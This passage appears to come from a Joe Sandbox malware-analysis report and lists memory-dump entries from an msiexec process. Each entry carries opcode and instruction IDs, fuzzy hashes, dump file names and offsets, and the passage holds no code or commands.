                                                                                                                                                                • Opcode Fuzzy Hash: 31ed44b66836f3fe0c2224592b5846dfec6eb12afe822995f94207a59b48614f
                                                                                                                                                                • Instruction Fuzzy Hash: A1D1BF74E00218CFDB15DFA5C990B9DBBB2BF89300F5085A9D809AB3A9DB359D85CF11
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000005.00000002.3305302342.0000000023EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23EE0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_5_2_23ee0000_msiexec.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: bacb1a94fc6b67b75986c29b8256e2d855174ebbf46fe7b933dd10e7aa03a227
                                                                                                                                                                • Instruction ID: c828899fc9f489cf9f4f606df590bfcd2136237a7cb4e6f1efca0311c7395979
                                                                                                                                                                • Opcode Fuzzy Hash: bacb1a94fc6b67b75986c29b8256e2d855174ebbf46fe7b933dd10e7aa03a227
                                                                                                                                                                • Instruction Fuzzy Hash: 24D1C074E00218CFDB15DFA5C980B9DBBB2BF89300F6085A9D809AB369DB359D85CF11
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000005.00000002.3305302342.0000000023EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23EE0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_5_2_23ee0000_msiexec.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 3484678b3ceb347d1a417669dba325e7a12cfcd9b4c52c5e82e74cd89d0a89f7
                                                                                                                                                                • Instruction ID: 7fee538db603a63e1cf2d426bdf846465399eeaa3174a72399c86afc5cdc757e
                                                                                                                                                                • Opcode Fuzzy Hash: 3484678b3ceb347d1a417669dba325e7a12cfcd9b4c52c5e82e74cd89d0a89f7
                                                                                                                                                                • Instruction Fuzzy Hash: BCD1CF74E00218CFDB15DFA9C990B9DBBB2BF89300F5085A9D809AB369DB359D85CF11
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000005.00000002.3305302342.0000000023EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23EE0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_5_2_23ee0000_msiexec.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 94837c1cf058c3f4cf01ba69c7a6d724f99d6cdd10240022e1d74a4fcbb0eed3
                                                                                                                                                                • Instruction ID: 06231a53632e37a5078c9eafd83f6e2071f7b34d30c4a1bd5571da6c911bf075
                                                                                                                                                                • Opcode Fuzzy Hash: 94837c1cf058c3f4cf01ba69c7a6d724f99d6cdd10240022e1d74a4fcbb0eed3
                                                                                                                                                                • Instruction Fuzzy Hash: 56D1C074E00218CFDB15DFA5C980B9DBBB2BF89300F5085A9D909AB369DB359D85CF11
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000005.00000002.3305302342.0000000023EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23EE0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_5_2_23ee0000_msiexec.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: e95d9cc00f91f2b6d626429a5be9b6b5f663211bd598842d54f5183def79ada1
                                                                                                                                                                • Instruction ID: 11e827c6b156710381bf318d8976059a47eab632e2eea2c7c59ffb103ce6232b
                                                                                                                                                                • Opcode Fuzzy Hash: e95d9cc00f91f2b6d626429a5be9b6b5f663211bd598842d54f5183def79ada1
                                                                                                                                                                • Instruction Fuzzy Hash: A2D1AE74E00218CFDB15DFA9C990B9DBBB2BF89300F5085A9D809AB369DB359D85CF11
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000005.00000002.3305302342.0000000023EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23EE0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_5_2_23ee0000_msiexec.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: d7b34036a9e847fb7c0b7d5b6632fb072c8c95c59b00cec92e5d68434b80893a
                                                                                                                                                                • Instruction ID: 948d68c17c94875b376131ad3350c9153904418393dab104b3716c3433739e4a
                                                                                                                                                                • Opcode Fuzzy Hash: d7b34036a9e847fb7c0b7d5b6632fb072c8c95c59b00cec92e5d68434b80893a
                                                                                                                                                                • Instruction Fuzzy Hash: 11C1C574E00218CFDB14DFA5C954B9DBBB2BF89300F6085A9D809AB369DB359E85CF50
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000005.00000002.3285977148.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_5_2_390000_msiexec.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: \;jq$\;jq$\;jq$\;jq
                                                                                                                                                                • API String ID: 0-138087212
                                                                                                                                                                • Opcode ID: 02b555011c5778c990a4630888e9f7cf563a9ccc2b1399dd5fd01fdc7d93d0a2
                                                                                                                                                                • Instruction ID: 30a1146b7890b01c41c00b34044ce5d464f067d9432e74c3cab9cb1bd48fa36e
                                                                                                                                                                • Opcode Fuzzy Hash: 02b555011c5778c990a4630888e9f7cf563a9ccc2b1399dd5fd01fdc7d93d0a2
                                                                                                                                                                • Instruction Fuzzy Hash: BC018B317422158FCF269E2DC651A2677EBAF98760726416AE806CB3B4DF31EC419790